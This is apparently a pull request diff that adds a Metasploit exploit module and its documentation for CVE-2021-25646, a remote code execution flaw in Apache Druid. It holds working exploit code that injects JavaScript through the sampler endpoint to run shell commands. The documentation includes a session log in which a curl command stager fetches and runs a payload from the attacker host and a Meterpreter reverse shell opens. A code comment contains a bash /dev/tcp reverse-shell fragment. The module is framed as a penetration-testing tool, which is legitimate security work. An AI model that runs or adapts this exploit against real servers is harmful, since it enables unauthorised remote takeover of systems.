### PR TITLE
Add Apache Druid CVE-2021-25646 RCE exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -28,6 +28,8 @@ Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)
 
 Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)
 
+Apache Druid 0.20.0 Debian 9.13 (Linux 5.4.0-1038-aws)
+
 Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)
 
 ### Setup
@@ -75,32 +77,25 @@ The base path to the Apache Druid application. This is set to `/` by default.
 
 ## Scenarios
 
-### Apache Druid 0.20.0-iap4.1 on SaltStack Salt 3002.2 on Ubuntu 18.04 (Linux 4.19.112+)
+### Apache Druid 0.20.0-iap4.1 on Ubuntu 18.04 (Linux 4.19.112+)
 
 ```
-msf6 > use exploit/linux/http/apache_druid_js_rce
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
-msf6 exploit(linux/http/apache_druid_js_rce) > set rhosts 10.100.70.2
-rhosts => 10.100.70.2
-msf6 exploit(linux/http/apache_druid_js_rce) > set rport 8888
-rport => 8888
-msf6 exploit(linux/http/apache_druid_js_rce) > set verbose true
-verbose => true
 msf6 exploit(linux/http/apache_druid_js_rce) > options
 
 Module options (exploit/linux/http/apache_druid_js_rce):
 
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS    10.100.70.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     8888             yes       The target port (TCP)
-   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT   8080             yes       The local port to listen on.
-   SSL       false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                    no        The URI to use for this exploit (default is random)
-   VHOST                      no        HTTP server virtual host
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.100.70.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8888             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path of Apache Druid
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
 
 
 Payload options (linux/x64/meterpreter/reverse_tcp):
@@ -118,19 +113,28 @@ Exploit target:
    0   Linux (dropper)
 
 
-msf6 exploit(linux/http/apache_druid_js_rce) > run
+msf6 exploit(linux/http/apache_druid_js_rce) > check
+
+[*] Attempting to execute 'echo XjUoa3Mw8z0UBQKnZ' on the target.
+[*] cmd= /bin/sh`@~-c`@~echo XjUoa3Mw8z0UBQKnZ   var=RUmlsVEYh   name=rZXrMaTO
+[+] 10.100.70.2:8888 - The target is vulnerable.
+msf6 exploit(linux/http/apache_druid_js_rce) > exploit
 
 [*] Started reverse TCP handler on 10.100.70.1:4444
-[*] Using URL: http://0.0.0.0:8080/NCId0EEi0G9
-[*] Local IP: http://10.100.70.1:8080/NCId0EEi0G9
-[*] Generated command stager: ["curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU"]
-[*] Executing command /bin/bash`@~-c`@~curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU ......
-[*] Client 10.100.70.2 (curl/7.58.0) requested /NCId0EEi0G9
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to execute 'echo hKJDyfi80sjuaSwfa38Skra' on the target.
+[*] cmd= /bin/sh`@~-c`@~echo hKJDyfi80sjuaSwfa38Skra   var=MRCLndLkidu   name=eAYzmpMSm
+[+] The target is vulnerable.
+[*] Using URL: http://0.0.0.0:8080/t1yvMQyzxpNEIO
+[*] Local IP: http://10.100.70.1:8080/t1yvMQyzxpNEIO
+[*] Generated command stager: ["curl -so /tmp/OWmIlZjX http://10.100.70.1:8080/t1yvMQyzxpNEIO;chmod +x /tmp/OWmIlZjX;/tmp/OWmIlZjX;rm -f /tmp/OWmIlZjX"]
+[*] cmd= /bin/sh`@~-c`@~curl -so /tmp/OWmIlZjX http://10.100.70.1:8080/t1yvMQyzxpNEIO;chmod +x /tmp/OWmIlZjX;/tmp/OWmIlZjX;rm -f /tmp/OWmIlZjX   var=xZpqsqSBeZ   name=qVwUlOBO
+[*] Client 10.100.70.2 (curl/7.58.0) requested /t1yvMQyzxpNEIO
 [*] Sending payload to 10.100.70.2 (curl/7.58.0)
 [*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3008420 bytes) to 10.100.70.2
-[*] Meterpreter session 2 opened (10.100.70.1:4444 -> 10.100.70.2:59996) at 2021-03-31 10:56:03 +0800
-[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Sending stage (3012516 bytes) to 10.100.70.2
+[*] Meterpreter session 4 opened (10.100.70.1:4444 -> 10.100.70.2:39486) at 2021-04-10 10:28:56 +0800
+[*] Command Stager progress - 100.00% done (122/122 bytes)
 [*] Server stopped.
 
 meterpreter > sysinfo
@@ -139,5 +143,6 @@ OS           : Ubuntu 18.04 (Linux 4.19.112+)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter >
 
 ```

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -94,7 +94,6 @@ Module options (exploit/linux/http/apache_druid_js_rce):
 
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
-   CHECKCMD  id               yes       The command to execute as checking vulnerability
    Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS    10.100.70.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT     8888             yes       The target port (TCP)

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -1,13 +1,16 @@
-
 ## Vulnerable Application
-Apache Druid
+
+Apache Druid versions prior to `v0.20.1`
+
 ### Description
 
-This module post json type request to Apache Druid with "config" is set to true, 
-and execute command in "function" with Javascript to exploit.
-But it seem that some payloads can't execute successfully and no reason,
-such as cmd/unix/reverse_python
-
+Apache Druid includes the ability to execute user-provided JavaScript code embedded in
+various types of requests; however, that feature is disabled by default.
+          
+In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request
+that both enables the JavaScript code-execution feature and executes the supplied code all
+at once, allowing for code execution on the server with the privileges of the Druid Server process.
+More critically, authentication is not enabled in Apache Druid by default.
 
 It has been fixed in Apache Druid 0.20.1
 

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -12,9 +12,10 @@ that both enables the JavaScript code-execution feature and executes the supplie
 at once, allowing for code execution on the server with the privileges of the Druid Server process.
 More critically, authentication is not enabled in Apache Druid by default.
 
-It has been fixed in Apache Druid 0.20.1
+The issue has been fixed in Apache Druid `v0.20.1`
 
-This module has been tested successfully against bebelow:
+This module has been tested successfully against the following versions:
+
 
 Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)
 

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -33,10 +33,18 @@ Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)
 
 ### Setup
 
-Just use docker,but any other version you need to find by yourself
+A Docker container is available [here](https://hub.docker.com/r/fokkodriesprong/docker-druid)
 
-docker pull fokkodriesprong/docker-druid
-docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
+To setup and run:
+
+`docker pull fokkodriesprong/docker-druid`
+`docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid`
+
+For a manual setup:
+* Download a vulnerable version of Apache Druid from [here](https://archive.apache.org/dist/druid/)
+* Extract the downloaded archive
+* Ensure a supported version of Java is installed on the system
+* Start Apache Druid: `bin/start-nano-quickstart`
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -1,0 +1,134 @@
+
+## Vulnerable Application
+Apache Druid
+### Description
+
+This module post json type request to Apache Druid with "config" is set to true, 
+and execute command in "function" with Javascript to exploit.
+But it seem that some payloads can't execute successfully and no reason,
+such as cmd/unix/reverse_python
+
+
+It has been fixed in Apache Druid 0.20.1
+
+This module has been tested successfully against bebelow:
+
+Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)
+
+Apache Druid 0.16.0-iap8  Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)
+
+Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)
+
+Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)
+
+Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)
+
+Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)
+
+Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)
+
+### Setup
+
+Just use docker,but any other version you need to find by yourself
+
+docker pull fokkodriesprong/docker-druid
+docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_druid_js_rce`
+1. Do: `set rhosts <ip>`
+1. Do: `set lhost <ip>`
+1. Do: `set lport/srvport <ip>` if necessary
+1. Do: `run`
+1. You should get a shell.
+
+## Targets
+
+### 0 (Linux Dropper)
+
+This uses a Linux dropper to execute code.
+
+### 1 (Unix Command)
+
+This executes a Unix command.
+
+## Options
+
+### CHECKCMD
+
+You can set a customize command to check and get command exec result respond.
+Default is "id"
+
+
+## Scenarios
+
+### Apache Druid 0.20.0-iap4.1 on SaltStack Salt 3002.2 on Ubuntu 18.04 (Linux 4.19.112+)
+
+```
+msf6 > use exploit/linux/http/apache_druid_js_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_druid_js_rce) > set rhosts 10.100.70.2
+rhosts => 10.100.70.2
+msf6 exploit(linux/http/apache_druid_js_rce) > set rport 8888
+rport => 8888
+msf6 exploit(linux/http/apache_druid_js_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/apache_druid_js_rce) > options
+
+Module options (exploit/linux/http/apache_druid_js_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   CHECKCMD  id               yes       The command to execute as checking vulnerability
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    10.100.70.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT     8888             yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   8080             yes       The local port to listen on.
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.100.70.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux (dropper)
+
+
+msf6 exploit(linux/http/apache_druid_js_rce) > run
+
+[*] Started reverse TCP handler on 10.100.70.1:4444
+[*] Using URL: http://0.0.0.0:8080/NCId0EEi0G9
+[*] Local IP: http://10.100.70.1:8080/NCId0EEi0G9
+[*] Generated command stager: ["curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU"]
+[*] Executing command /bin/bash`@~-c`@~curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU ......
+[*] Client 10.100.70.2 (curl/7.58.0) requested /NCId0EEi0G9
+[*] Sending payload to 10.100.70.2 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3008420 bytes) to 10.100.70.2
+[*] Meterpreter session 2 opened (10.100.70.1:4444 -> 10.100.70.2:59996) at 2021-03-31 10:56:03 +0800
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 10.100.70.2
+OS           : Ubuntu 18.04 (Linux 4.19.112+)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -6,7 +6,7 @@ Apache Druid versions prior to `v0.20.1`
 
 Apache Druid includes the ability to execute user-provided JavaScript code embedded in
 various types of requests; however, that feature is disabled by default.
-          
+
 In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request
 that both enables the JavaScript code-execution feature and executes the supplied code all
 at once, allowing for code execution on the server with the privileges of the Druid Server process.
@@ -15,7 +15,6 @@ More critically, authentication is not enabled in Apache Druid by default.
 The issue has been fixed in Apache Druid `v0.20.1`
 
 This module has been tested successfully against the following versions:
-
 
 Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)
 
@@ -41,6 +40,7 @@ To setup and run:
 `docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid`
 
 For a manual setup:
+
 * Download a vulnerable version of Apache Druid from [here](https://archive.apache.org/dist/druid/)
 * Extract the downloaded archive
 * Ensure a supported version of Java is installed on the system
@@ -49,13 +49,13 @@ For a manual setup:
 ## Verification Steps
 
 1. Install the application
-1. Start msfconsole
-1. Do: `use exploit/linux/http/apache_druid_js_rce`
-1. Do: `set rhosts <ip>`
-1. Do: `set lhost <ip>`
-1. Do: `set lport/srvport <ip>` if necessary
-1. Do: `run`
-1. You should get a shell.
+2. Start msfconsole
+3. Do: `use exploit/linux/http/apache_druid_js_rce`
+4. Do: `set rhosts <ip>`
+5. Do: `set lhost <ip>`
+6. Do: `set lport/srvport <ip>` if necessary
+7. Do: `run`
+8. You should get a shell.
 
 ## Targets
 
@@ -69,11 +69,9 @@ This executes a Unix command.
 
 ## Options
 
-### CHECKCMD
+### TARGETURI
 
-You can set a customize command to check and get command exec result respond.
-Default is "id"
-
+The base path to the Apache Druid application. This is set to `/` by default.
 
 ## Scenarios
 

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
           Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
           This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
-          The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
+          The module still exit many bug, for example, cmd/unix/reverse_python can't work well, target sometime will wget/curl many time but I can't find any reason.
         },
         'Author' => [
           'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res.code == 200
       return CheckCode::Safe
     end
-    if res.body.include?('data') & res.body.include?('test')
+    if res.body.include?('data') && res.body.include?('test')
       return CheckCode::Vulnerable("- CMD response! =>\n #{JSON.parse(res.body)['data'][0]['parsed']['test']}")
     end
 

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
@@ -36,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
-          'je5442804', # Metasploit module
+          'je5442804' # Metasploit module
         ],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'References' => [
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2021-01-21',
         'License' => MSF_LICENSE,
-        'Platform' => [ 'unix', 'linux' ],
+        'Platform' => ['unix', 'linux'],
         'Targets' => [
           [
             'Linux (dropper)', {
@@ -78,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(8888)
+      Opt::RPORT(8888),
+      OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/'])
     ])
   end
 
@@ -117,13 +119,13 @@ class MetasploitModule < Msf::Exploit::Remote
         numRows: 10
       }
     }.to_json
+
     send_request_cgi({
       'method' => 'POST',
-      'uri' => '/druid/indexer/v1/sampler',
+      'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'),
       'ctype' => 'application/json',
       'headers' => {
-        'Accept' => 'application/json, text/plain, */*',
-        'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+        'Accept' => 'application/json, text/plain, */*'
       },
       'data' => post_data
     })
@@ -131,20 +133,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a')
+
+    vprint_status("Attempting to execute 'echo #{genecho}' on the target.")
     res = execute_command("echo #{genecho}")
     unless res
       return CheckCode::Unknown('Connection failed.')
     end
 
-    vprint_status(res.body)
     unless res.code == 200
       return CheckCode::Safe
     end
+
     if res.body.include?(genecho)
       return CheckCode::Vulnerable
     end
 
-    CheckCode::Unknown('Target does not seem to be running Apache Druid')
+    CheckCode::Unknown('Target does not seem to be running Apache Druid.')
   end
 
   def exploit

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -1,0 +1,145 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+       'Name'           => 'Apache Druid 0.20.0 Remote Command Execution',
+       'Description'    => %q{
+          Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests.
+          In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
+          It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration.
+          More critically,most of Apache Druid don't need to any auth.
+          This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
+
+          Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
+          This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
+          The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
+         },
+       'Author'         => [
+          'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
+          'je5442804', # Metasploit module
+         ],
+       'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+       'References'     => [
+            ['CVE', '2021-25646'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
+            ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
+            ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
+        ],
+        'DisclosureDate' => 'Jan 21 2021',
+        'License'        => MSF_LICENSE,
+        'Platform'       => [ 'unix', 'linux' ],
+        'Targets'        => [
+         ['Linux (dropper)', {
+           'Platform'    => 'linux',
+           'Type' => :linux_dropper,
+           'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
+           'CmdStagerFlavor' => %w[curl wget],
+           'Arch'        => [ARCH_X86, ARCH_X64]
+         }],
+         ['Unix (in-memory)',{
+           'Platform' => 'unix',
+           'Arch' => ARCH_CMD,
+           'Type' => :unix_memory,
+                   'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+        }],
+        ],
+       'DefaultTarget'  => 0,
+       'Privileged' => true,
+       'Note' =>{
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+       }
+    ))
+
+       register_options([
+          Opt::RPORT(8888),
+          OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
+      ])
+  end
+
+  def execute_command(cmd, opts = {})
+        gencmd = "/bin/bash`@~-c`@~"+cmd
+        vprint_status("Executing command #{gencmd} ......")
+        post_data = {
+                "type": "index",
+                "spec": {
+                        "ioConfig": {
+                                "type": "index",
+                                "firehose": {
+                                        "type": "local",
+                                        "baseDir": "/etc",
+                                        "filter": "passwd"
+                                }
+                        },
+                        "dataSchema": {
+                                "dataSource": "%%DATASOURCE%%",
+                                "parser": {
+                                        "parseSpec": {
+                                                "format": "javascript",
+                                                "timestampSpec": {},
+                                                "dimensionsSpec": {},                           #/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
+                                                "function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
+                                                "": {
+                                                        "enabled": "true"
+                                                }
+                                        }
+                                }
+                        }
+                },
+                "samplerConfig": {
+                        "numRows": 10
+                }
+        }.to_json
+        res = send_request_cgi({
+          'method' => 'POST',
+          'uri'    => '/druid/indexer/v1/sampler',
+          'ctype' => 'application/json',
+          'headers' => {
+                'Accept' => 'application/json, text/plain, */*',
+                'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
+                'Connection' => 'keep-alive'
+          },
+          'data' => post_data
+        })
+        return res
+  end
+
+  def check
+    if datastore['CHECKCMD'].empty?
+      return CheckCode::Unknown("CHECKCMD can not be empty!")
+    else
+      res = execute_command("#{datastore['CHECKCMD']}")
+    end
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+    unless res.code == 200
+      return CheckCode::Safe
+    end
+    if res.body.include?('data') & res.body.include?('test')
+      return CheckCode::Vulnerable("- CMD response! =>\n #{JSON.parse(res.body)['data'][0]['parsed']['test']}")
+    end
+      return CheckCode::Unknown("Target seem isn't Apache Druid")
+    end
+
+  def exploit
+    case target['Type']
+      when :linux_dropper
+        execute_cmdstager
+      when :unix_memory
+        execute_command(payload.encoded)
+      end
+
+  end
+
+ end

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
         numRows: 10
       }
     }.to_json
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => '/druid/indexer/v1/sampler',
       'ctype' => 'application/json',
@@ -126,7 +126,6 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'data' => post_data
     })
-    return res
   end
 
   def check

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -10,9 +10,11 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
-    super(update_info(info,
-       'Name'           => 'Apache Druid 0.20.0 Remote Command Execution',
-       'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Druid 0.20.0 Remote Command Execution',
+        'Description' => %q{
           Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests.
           In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
           It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration.
@@ -22,103 +24,108 @@ class MetasploitModule < Msf::Exploit::Remote
           Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
           This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
           The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
-         },
-       'Author'         => [
+        },
+        'Author' => [
           'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
           'je5442804', # Metasploit module
-         ],
-       'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-       'References'     => [
-            ['CVE', '2021-25646'],
-            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
-            ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
-            ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
         ],
-        'DisclosureDate' => 'Jan 21 2021',
-        'License'        => MSF_LICENSE,
-        'Platform'       => [ 'unix', 'linux' ],
-        'Targets'        => [
-         ['Linux (dropper)', {
-           'Platform'    => 'linux',
-           'Type' => :linux_dropper,
-           'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
-           'CmdStagerFlavor' => %w[curl wget],
-           'Arch'        => [ARCH_X86, ARCH_X64]
-         }],
-         ['Unix (in-memory)',{
-           'Platform' => 'unix',
-           'Arch' => ARCH_CMD,
-           'Type' => :unix_memory,
-                   'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-        }],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'References' => [
+          ['CVE', '2021-25646'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
+          ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
+          ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
         ],
-       'DefaultTarget'  => 0,
-       'Privileged' => true,
-       'Note' =>{
+        'DisclosureDate' => '2021-01-21',
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'unix', 'linux' ],
+        'Targets' => [
+          [
+            'Linux (dropper)', {
+              'Platform' => 'linux',
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' },
+              'CmdStagerFlavor' => %w[curl wget],
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'Unix (in-memory)', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => true,
+        'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
-       }
-    ))
+        }
+      )
+    )
 
-       register_options([
-          Opt::RPORT(8888),
-          OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
-      ])
+    register_options([
+      Opt::RPORT(8888),
+      OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
+    ])
   end
 
-  def execute_command(cmd, opts = {})
-        gencmd = "/bin/bash`@~-c`@~"+cmd
-        vprint_status("Executing command #{gencmd} ......")
-        post_data = {
-                "type": "index",
-                "spec": {
-                        "ioConfig": {
-                                "type": "index",
-                                "firehose": {
-                                        "type": "local",
-                                        "baseDir": "/etc",
-                                        "filter": "passwd"
-                                }
-                        },
-                        "dataSchema": {
-                                "dataSource": "%%DATASOURCE%%",
-                                "parser": {
-                                        "parseSpec": {
-                                                "format": "javascript",
-                                                "timestampSpec": {},
